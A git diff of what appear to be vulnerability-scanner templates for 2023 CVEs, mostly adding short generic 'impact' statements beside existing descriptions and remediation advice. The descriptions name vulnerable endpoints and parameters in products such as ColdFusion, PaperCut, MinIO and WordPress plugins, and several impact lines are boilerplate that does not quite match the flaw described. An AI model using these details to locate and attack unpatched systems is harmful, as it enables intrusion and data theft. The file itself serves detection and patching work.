03cced30db..9e3703f1a1 100644 --- a/http/cves/2023/CVE-2023-26067.yaml +++ b/http/cves/2023/CVE-2023-26067.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4). + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the affected device. remediation: | Apply the latest firmware update provided by Lexmark to mitigate the command injection vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-26255.yaml b/http/cves/2023/CVE-2023-26255.yaml index d961c4c9b5..650fac0577 100644 --- a/http/cves/2023/CVE-2023-26255.yaml +++ b/http/cves/2023/CVE-2023-26255.yaml @@ -6,6 +6,8 @@ info: severity: high description: | STAGIL Navigation for Jira Menu & Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjCustomDesignConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server. remediation: | Upgrade STAGIL Navigation for Jira Menu & Themes to version 2.0.52 or higher to fix the Local File Inclusion vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-26256.yaml b/http/cves/2023/CVE-2023-26256.yaml index 2c5f8c2e5b..29634a6ea1 100644 --- a/http/cves/2023/CVE-2023-26256.yaml +++ b/http/cves/2023/CVE-2023-26256.yaml @@ -6,6 +6,8 @@ info: severity: high description: | STAGIL Navigation for Jira Menu & Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjFooterNavigationConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server. remediation: | Upgrade STAGIL Navigation for Jira Menu & Themes to version 2.0.52 or higher to fix the Local File Inclusion vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-26360.yaml b/http/cves/2023/CVE-2023-26360.yaml index f02043e8a0..4828812b45 100644 --- a/http/cves/2023/CVE-2023-26360.yaml +++ b/http/cves/2023/CVE-2023-26360.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Unauthenticated Arbitrary File Read vulnerability due to deserialization of untrusted data in Adobe ColdFusion. The vulnerability affects ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier + impact: | + This vulnerability can lead to unauthorized access to sensitive information stored on the server. remediation: | Apply the necessary security patches or updates provided by Adobe to fix the vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-26469.yaml b/http/cves/2023/CVE-2023-26469.yaml index 2af82f3e94..5279ef0586 100644 --- a/http/cves/2023/CVE-2023-26469.yaml +++ b/http/cves/2023/CVE-2023-26469.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Jorani 1.0.0, an attacker could leverage path traversal to access files and execute code on the server. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: | Upgrade Jorani to a patched version or apply the necessary security patches. reference: diff --git a/http/cves/2023/CVE-2023-2648.yaml b/http/cves/2023/CVE-2023-2648.yaml index cab7d32bce..e35239c3f1 100644 --- a/http/cves/2023/CVE-2023-2648.yaml +++ b/http/cves/2023/CVE-2023-2648.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A vulnerability was found in Weaver E-Office 9.5. It has been classified as critical. This affects an unknown part of the file /inc/jquery/uploadify/uploadify.php. The manipulation of the argument Filedata leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-228777 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patch or upgrade to a patched version of Weaver E-Office. reference: diff --git a/http/cves/2023/CVE-2023-26842.yaml b/http/cves/2023/CVE-2023-26842.yaml index 7681ba2887..d115a864f6 100644 --- a/http/cves/2023/CVE-2023-26842.yaml +++ b/http/cves/2023/CVE-2023-26842.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the OptionManager.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to a patched version of ChurchCRM or apply the necessary security patches to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-26843.yaml b/http/cves/2023/CVE-2023-26843.yaml index 4e952f066f..657a216aaa 100644 --- a/http/cves/2023/CVE-2023-26843.yaml +++ b/http/cves/2023/CVE-2023-26843.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the NoteEditor.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to a patched version of ChurchCRM or apply the necessary security patches to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-27008.yaml b/http/cves/2023/CVE-2023-27008.yaml index 9669c72914..0e2a9a13fa 100644 --- a/http/cves/2023/CVE-2023-27008.yaml +++ b/http/cves/2023/CVE-2023-27008.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | ATutor < 2.2.1 was discovered with a vulnerability, a reflected cross-site scripting (XSS), in ATtutor 2.2.1 via token body parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade ATutor to version 2.2.2 or above to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-27034.yaml b/http/cves/2023/CVE-2023-27034.yaml index 4659e7c454..d0a8e724d5 100644 --- a/http/cves/2023/CVE-2023-27034.yaml +++ b/http/cves/2023/CVE-2023-27034.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The module Jms Blog (jmsblog) from Joommasters contains a Blind SQL injection vulnerability. This module is for the PrestaShop e-commerce platform and mainly provided with joommasters PrestaShop themes + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire application and its underlying infrastructure. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-27159.yaml b/http/cves/2023/CVE-2023-27159.yaml index 459b527659..3755c67b76 100644 --- a/http/cves/2023/CVE-2023-27159.yaml +++ b/http/cves/2023/CVE-2023-27159.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Appwrite through 1.2.1 is susceptible to server-side request forgery via the component /v1/avatars/favicon. An attacker can potentially access network resources and sensitive information via a crafted GET request, thereby also making it possible to modify data and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + This vulnerability can lead to unauthorized access to internal resources, potential data leakage, and further exploitation of the server. remediation: | Upgrade Appwrite to a version higher than 1.2.1 to mitigate the SSRF vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-27179.yaml b/http/cves/2023/CVE-2023-27179.yaml index 99bfb5fca5..3259e2691e 100644 --- a/http/cves/2023/CVE-2023-27179.yaml +++ b/http/cves/2023/CVE-2023-27179.yaml @@ -6,6 +6,8 @@ info: severity: high description: | GDidees CMS v3.9.1 and lower was discovered to contain an arbitrary file download vulenrability via the filename parameter at /_admin/imgdownload.php. + impact: | + An attacker can exploit this vulnerability to download arbitrary files from the server. remediation: | Apply the latest patch or upgrade to a newer version of GDidees CMS. reference: diff --git a/http/cves/2023/CVE-2023-27292.yaml b/http/cves/2023/CVE-2023-27292.yaml index 3610e1c372..13d2a955f7 100644 --- a/http/cves/2023/CVE-2023-27292.yaml +++ b/http/cves/2023/CVE-2023-27292.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | OpenCATS contains an open redirect vulnerability due to improper validation of user-supplied GET parameters. This, in turn, exposes OpenCATS to possible template injection and obtaining sensitive information, modifying data, and/or executing unauthorized operations. + impact: | + An attacker can redirect users to malicious websites, leading to phishing attacks or the download of malware. remediation: | Apply the latest patch or update to the latest version of OpenCATS to fix the open redirect vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-2732.yaml b/http/cves/2023/CVE-2023-2732.yaml index 70c045fea9..8a8424a2a2 100644 --- a/http/cves/2023/CVE-2023-2732.yaml +++ b/http/cves/2023/CVE-2023-2732.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.2. This is due to insufficient verification on the user being supplied during the add listing REST API request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id. + impact: | + An attacker can bypass authentication and gain unauthorized access to the MStore API, potentially leading to data breaches or unauthorized actions. remediation: | Upgrade to a patched version of MStore API (version 3.9.3 or above) to mitigate the authentication bypass vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-27350.yaml b/http/cves/2023/CVE-2023-27350.yaml index f3730e1078..2abd471d56 100644 --- a/http/cves/2023/CVE-2023-27350.yaml +++ b/http/cves/2023/CVE-2023-27350.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SetupCompleted class. The issue results from improper access control. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-18987. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: | Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-27372.yaml b/http/cves/2023/CVE-2023-27372.yaml index bc0497236d..ca69bbb453 100644 --- a/http/cves/2023/CVE-2023-27372.yaml +++ b/http/cves/2023/CVE-2023-27372.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system. remediation: | Apply the latest security patches or upgrade to a patched version of SPIP. reference: diff --git a/http/cves/2023/CVE-2023-27482.yaml b/http/cves/2023/CVE-2023-27482.yaml index dd868fb49e..01a57fd5d7 100644 --- a/http/cves/2023/CVE-2023-27482.yaml +++ b/http/cves/2023/CVE-2023-27482.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Home Assistant Supervisor is an open source home automation tool. A remotely exploitable vulnerability bypassing authentication for accessing the Supervisor API through Home Assistant has been discovered.This impacts all Home Assistant installation types that use the Supervisor 2023.01.1 or older. Installation types, like Home Assistant Container (for example Docker), or Home Assistant Core manually in a Python environment, are not affected. + impact: | + An attacker can bypass authentication and gain unauthorized access to the Home Assistant Supervisor, potentially leading to further compromise of the system. remediation: | The issue has been mitigated and closed in Supervisor version 2023.03.1, which has been rolled out to all affected installations via the auto-update feature of the Supervisor. This rollout has been completed at the time of publication of this advisory. Home Assistant Core 2023.3.0 included mitigation for this vulnerability. Upgrading to at least that version is thus advised. In case one is not able to upgrade the Home Assistant Supervisor or the Home Assistant Core application at this time, it is advised to not expose your Home Assistant instance to the internet. reference: diff --git a/http/cves/2023/CVE-2023-27524.yaml b/http/cves/2023/CVE-2023-27524.yaml index 62522af1e7..850dece5d6 100644 --- a/http/cves/2023/CVE-2023-27524.yaml +++ b/http/cves/2023/CVE-2023-27524.yaml @@ -5,6 +5,8 @@ info: author: DhiyaneshDK,_0xf4n9x_ severity: critical description: Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to sensitive information. remediation: | Apply the latest security patches or upgrade to a patched version of Apache Superset. reference: diff --git a/http/cves/2023/CVE-2023-27587.yaml b/http/cves/2023/CVE-2023-27587.yaml index 05146bb2d6..6c29fa3362 100644 --- a/http/cves/2023/CVE-2023-27587.yaml +++ b/http/cves/2023/CVE-2023-27587.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | ReadToMyShoe generates an error message containing sensitive information prior to commit 8533b01. If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, it will include the full URL of the request, which contains the Google Cloud API key. + impact: | + This vulnerability can lead to the exposure of sensitive information, such as usernames, passwords, or internal system details. remediation: This has been patched in commit 8533b01. Upgrading should be accompanied by deleting the current GCP API key and issuing a new one. There are no known workarounds. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27587 diff --git a/http/cves/2023/CVE-2023-2766.yaml b/http/cves/2023/CVE-2023-2766.yaml index bb9dc4c5e7..a50ece0442 100644 --- a/http/cves/2023/CVE-2023-2766.yaml +++ b/http/cves/2023/CVE-2023-2766.yaml @@ -6,17 +6,19 @@ info: severity: high description: | A vulnerability was found in Weaver OA 9.5 and classified as problematic. This issue affects some unknown processing of the file /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini. The manipulation leads to files or directories accessible. The attack may be initiated remotely. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information. reference: - https://github.com/8079048q/cve/blob/main/weaveroa.md - https://nvd.nist.gov/vuln/detail/CVE-2023-2766 classification: - cve-id: CVE-2023-2766 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 + cve-id: CVE-2023-2766 cwe-id: CWE-552 metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: app="泛微-EOffice" tags: cve,cve2023,weaver,eoffice,exposure diff --git a/http/cves/2023/CVE-2023-2780.yaml b/http/cves/2023/CVE-2023-2780.yaml index 787ba35001..d0f1ce457b 100644 --- a/http/cves/2023/CVE-2023-2780.yaml +++ b/http/cves/2023/CVE-2023-2780.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.3.1. + impact: | + Successful exploitation could allow an attacker to read sensitive files on the server. remediation: | Upgrade Mlflow to version 2.3.1 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-2796.yaml b/http/cves/2023/CVE-2023-2796.yaml index 4826ae4018..7e33ba0cbc 100644 --- a/http/cves/2023/CVE-2023-2796.yaml +++ b/http/cves/2023/CVE-2023-2796.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The EventON WordPress plugin before 2.1.2 lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id. + impact: | + Unauthenticated users can perform privileged actions, potentially leading to unauthorized access or modification of events. remediation: Fixed in version 2.1.2 reference: - https://www.wordfence.com/threat-intel/vulnerabilities/id/dba3f3a6-3f55-4f4e-98e4-bb98d9c94bdd diff --git a/http/cves/2023/CVE-2023-28121.yaml b/http/cves/2023/CVE-2023-28121.yaml index 00fd25b09b..1447290c80 100644 --- a/http/cves/2023/CVE-2023-28121.yaml +++ b/http/cves/2023/CVE-2023-28121.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | An issue in WooCommerce Payments plugin for WordPress (versions 5.6.1 and lower) allows an unauthenticated attacker to send requests on behalf of an elevated user, like administrator. This allows a remote, unauthenticated attacker to gain admin access on a site that has the affected version of the plugin activated. + impact: | + An attacker can gain unauthorized access to the WooCommerce Payments admin panel, potentially leading to data theft or modification. remediation: | Update to the latest version of the WooCommerce Payments plugin to fix the vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-2813.yaml b/http/cves/2023/CVE-2023-2813.yaml index ad3c1583ff..4738d6c485 100644 --- a/http/cves/2023/CVE-2023-2813.yaml +++ b/http/cves/2023/CVE-2023-2813.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | All of the above Aapna WordPress theme through 1.3, Anand WordPress theme through 1.2, Anfaust WordPress theme through 1.1, Arendelle WordPress theme before 1.1.13, Atlast Business WordPress theme through 1.5.8.5, Bazaar Lite WordPress theme before 1.8.6, Brain Power WordPress theme through 1.2, BunnyPressLite WordPress theme before 2.1, Cafe Bistro WordPress theme before 1.1.4, College WordPress theme before 1.5.1, Connections Reloaded WordPress theme through 3.1, Counterpoint WordPress theme through 1.8.1, Digitally WordPress theme through 1.0.8, Directory WordPress theme before 3.0.2, Drop WordPress theme before 1.22, Everse WordPress theme before 1.2.4, Fashionable Store WordPress theme through 1.3.4, Fullbase WordPress theme before 1.2.1, Ilex WordPress theme before 1.4.2, Js O3 Lite WordPress theme through 1.5.8.2, Js Paper WordPress theme through 2.5.7, Kata WordPress theme before 1.2.9, Kata App WordPress theme through 1.0.5, Kata Business WordPress theme through 1.0.2, Looki Lite WordPress theme before 1.3.0, moseter WordPress theme through 1.3.1, Nokke WordPress theme before 1.2.4, Nothing Personal WordPress theme through 1.0.7, Offset Writing WordPress theme through 1.2, Opor Ayam WordPress theme through 18, Pinzolo WordPress theme before 1.2.10, Plato WordPress theme before 1.1.9, Polka Dots WordPress theme through 1.2, Purity Of Soul WordPress theme through 1.9, Restaurant PT WordPress theme before 1.1.3, Saul WordPress theme before 1.1.0, Sean Lite WordPress theme before 1.4.6, Tantyyellow WordPress theme through 1.0.0.5, TIJAJI WordPress theme through 1.43, Tiki Time WordPress theme through 1.3, Tuaug4 WordPress theme through 1.4, Tydskrif WordPress theme through 1.1.3, UltraLight WordPress theme through 1.2, Venice Lite WordPress theme before 1.5.5, Viala WordPress theme through 1.3.1, viburno WordPress theme before 1.3.2, Wedding Bride WordPress theme before 1.0.2, Wlow WordPress theme before 1.2.7 suffer from the same issue about the search box reflecting the results causing XSS which allows an unauthenticated attacker to exploit against users if they click a malicious link. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. reference: - https://wpscan.com/vulnerability/f434afd3-7de4-4bf4-a9bb-9f9aeaae1dc5 - https://nvd.nist.gov/vuln/detail/CVE-2023-2813 @@ -21,7 +23,6 @@ info: verified: true max-request: 1 tags: cve,cve2023,wordpress,wp-theme,xss - variables: str: "{{rand_base(6)}}" random: "{{rand_base(3)}}" diff --git a/http/cves/2023/CVE-2023-2822.yaml b/http/cves/2023/CVE-2023-2822.yaml index 932a03b839..03708ed121 100644 --- a/http/cves/2023/CVE-2023-2822.yaml +++ b/http/cves/2023/CVE-2023-2822.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A vulnerability was found in Ellucian Ethos Identity up to 5.10.5. It has been classified as problematic. Affected is an unknown function of the file /cas/logout. The manipulation of the argument url leads to cross site scripting. It is possible to launch the attack remotely. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Upgrading to version 5.10.6 is able to address this issue. It is recommended to upgrade the affected component. reference: - https://medium.com/@cyberninja717/685bb1675dfb diff --git a/http/cves/2023/CVE-2023-28343.yaml b/http/cves/2023/CVE-2023-28343.yaml index 4ff61dd6be..ead6d43517 100644 --- a/http/cves/2023/CVE-2023-28343.yaml +++ b/http/cves/2023/CVE-2023-28343.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Altenergy Power Control Software C1.2.5 is susceptible to remote command injection via shell metacharacters in the index.php/management/set_timezone parameter, because of set_timezone in models/management_model.php. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system. remediation: | Apply the latest security patches or updates provided by the vendor to fix the remote command injection vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-28432.yaml b/http/cves/2023/CVE-2023-28432.yaml index 9026ff090f..9a2acdf6a8 100644 --- a/http/cves/2023/CVE-2023-28432.yaml +++ b/http/cves/2023/CVE-2023-28432.yaml @@ -6,6 +6,8 @@ info: severity: high description: | MinIO is susceptible to information disclosure. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. All users of distributed deployment are impacted. + impact: | + An attacker can gain unauthorized access to sensitive information stored in the MinIO cluster. remediation: All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z. reference: - https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q diff --git a/http/cves/2023/CVE-2023-28665.yaml b/http/cves/2023/CVE-2023-28665.yaml index 86adba6269..6b11027be3 100644 --- a/http/cves/2023/CVE-2023-28665.yaml +++ b/http/cves/2023/CVE-2023-28665.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The Woo Bulk Price Update WordPress plugin, in versions < 2.2.2, is affected by a reflected cross-site scripting vulnerability in the 'page' parameter to the techno_get_products action, which can only be triggered by an authenticated user. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 2.2.2 reference: - https://wpscan.com/vulnerability/6f70182c-0392-40eb-a5b9-4ff91778e036 diff --git a/http/cves/2023/CVE-2023-29084.yaml b/http/cves/2023/CVE-2023-29084.yaml index 5eee45ba49..a5d791f8c2 100644 --- a/http/cves/2023/CVE-2023-29084.yaml +++ b/http/cves/2023/CVE-2023-29084.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Zoho ManageEngine ADManager Plus through 7180 allows for authenticated users to exploit command injection via Proxy settings. + impact: | + Successful exploitation of this vulnerability could lead to remote code execution, unauthorized access to sensitive information, or complete compromise of the target system. remediation: | Apply the latest security patch or update provided by the vendor to fix the command injection vulnerability in ManageEngine ADManager Plus. reference: diff --git a/http/cves/2023/CVE-2023-29298.yaml b/http/cves/2023/CVE-2023-29298.yaml index f69c4aba97..298069d93c 100644 --- a/http/cves/2023/CVE-2023-29298.yaml +++ b/http/cves/2023/CVE-2023-29298.yaml @@ -6,6 +6,8 @@ info: severity: high description: | An attacker is able to access every CFM and CFC endpoint within the ColdFusion Administrator path /CFIDE/, of which there are 437 CFM files and 96 CFC files in a ColdFusion 2021 Update 6 install. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass access controls and gain unauthorized access to sensitive information or perform unauthorized actions. remediation: | Apply the latest security patches or updates provided by Adobe to fix the access control bypass vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-29300.yaml b/http/cves/2023/CVE-2023-29300.yaml index 3aa911b0d6..c7643489f4 100644 --- a/http/cves/2023/CVE-2023-29300.yaml +++ b/http/cves/2023/CVE-2023-29300.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Adobe ColdFusion versions 2018u16 (and earlier), 2021u6 (and earlier) and 2023.0.0.330468 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade to Adobe ColdFusion version 2023.0.0.328155 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-29489.yaml b/http/cves/2023/CVE-2023-29489.yaml index e69c3c0787..f1d8532b58 100644 --- a/http/cves/2023/CVE-2023-29489.yaml +++ b/http/cves/2023/CVE-2023-29489.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | An issue was discovered in cPanel before 11.109.9999.116. Cross Site Scripting can occur on the cpsrvd error page via an invalid webcall ID. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by cPanel to fix this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-29622.yaml b/http/cves/2023/CVE-2023-29622.yaml index 2c9d2a3bbc..bf88b50293 100644 --- a/http/cves/2023/CVE-2023-29622.yaml +++ b/http/cves/2023/CVE-2023-29622.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Purchase Order Management v1.0 was discovered to contain a SQL injection vulnerability via the password parameter at /purchase_order/admin/login.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-29623.yaml b/http/cves/2023/CVE-2023-29623.yaml index 42da7244c4..f1f9058e9a 100644 --- a/http/cves/2023/CVE-2023-29623.yaml +++ b/http/cves/2023/CVE-2023-29623.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Purchase Order Management v1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the password parameter at /purchase_order/classes/login.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-2982.yaml b/http/cves/2023/CVE-2023-2982.yaml index 7fd524f6ea..66a8042d72 100644 --- a/http/cves/2023/CVE-2023-2982.yaml +++ b/http/cves/2023/CVE-2023-2982.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 7.6.4. This is due to insufficient encryption on the user being supplied during a login validated through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they know the email address associated with that user. This was partially patched in version 7.6.4 and fully patched in version 7.6.5. + impact: | + An attacker can gain unauthorized access to user accounts, potentially leading to data theft, privilege escalation, or other malicious activities. remediation: Fixed in version 7.6.5 reference: - https://lana.codes/lanavdb/2326f41f-a39f-4fde-8627-9d29fff91443/ diff --git a/http/cves/2023/CVE-2023-29887.yaml b/http/cves/2023/CVE-2023-29887.yaml index 1a06661227..49a8e2a9e2 100644 --- a/http/cves/2023/CVE-2023-29887.yaml +++ b/http/cves/2023/CVE-2023-29887.yaml @@ -6,6 +6,8 @@ info: severity: high description: | A Local File inclusion vulnerability in test.php in spreadsheet-reader 0.5.11 allows remote attackers to include arbitrary files via the File parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and further compromise of the server. remediation: | Upgrade to a patched version of Nuovo Spreadsheet Reader or apply the vendor-provided fix to mitigate the Local File Inclusion vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-29919.yaml b/http/cves/2023/CVE-2023-29919.yaml index d6d1fa0d30..88a9ae5617 100644 --- a/http/cves/2023/CVE-2023-29919.yaml +++ b/http/cves/2023/CVE-2023-29919.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | There is an arbitrary read file vulnerability in SolarView Compact 6.00 and below, attackers can bypass authentication to read files through texteditor.php + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade to a patched version of SolarView Compact or apply the vendor-provided security patch to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-29922.yaml b/http/cves/2023/CVE-2023-29922.yaml index 7b86186c98..01d483faea 100644 --- a/http/cves/2023/CVE-2023-29922.yaml +++ b/http/cves/2023/CVE-2023-29922.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create user/save interface. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the application. remediation: | Apply the latest security patch or upgrade to a patched version of PowerJob V4.3.1. reference: diff --git a/http/cves/2023/CVE-2023-29923.yaml b/http/cves/2023/CVE-2023-29923.yaml index c91626851e..1f0b0024fc 100644 --- a/http/cves/2023/CVE-2023-29923.yaml +++ b/http/cves/2023/CVE-2023-29923.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | PowerJob V4.3.1 is vulnerable to Insecure Permissions. via the list job interface. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information or perform malicious actions. remediation: | Upgrade PowerJob to a version higher than 4.3.2 or apply the necessary patches to fix the authentication bypass issue. reference: diff --git a/http/cves/2023/CVE-2023-30019.yaml b/http/cves/2023/CVE-2023-30019.yaml index bf348873df..0055ee600f 100644 --- a/http/cves/2023/CVE-2023-30019.yaml +++ b/http/cves/2023/CVE-2023-30019.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | imgproxy <=3.14.0 is vulnerable to Server-Side Request Forgery (SSRF) due to a lack of sanitization of the imageURL parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution. remediation: | Upgrade to a version of Imgproxy that is not affected by this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-30150.yaml b/http/cves/2023/CVE-2023-30150.yaml index df2f859cb3..4fba0cd594 100644 --- a/http/cves/2023/CVE-2023-30150.yaml +++ b/http/cves/2023/CVE-2023-30150.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | PrestaShop leocustomajax 1.0 and 1.0.0 are vulnerable to SQL Injection via modules/leocustomajax/leoajax.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the PrestaShop application and its underlying database. remediation: | Apply the latest security patch or upgrade to a patched version of PrestaShop leocustomajax plugin to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-30210.yaml b/http/cves/2023/CVE-2023-30210.yaml index d9f15d94de..d221f94d70 100644 --- 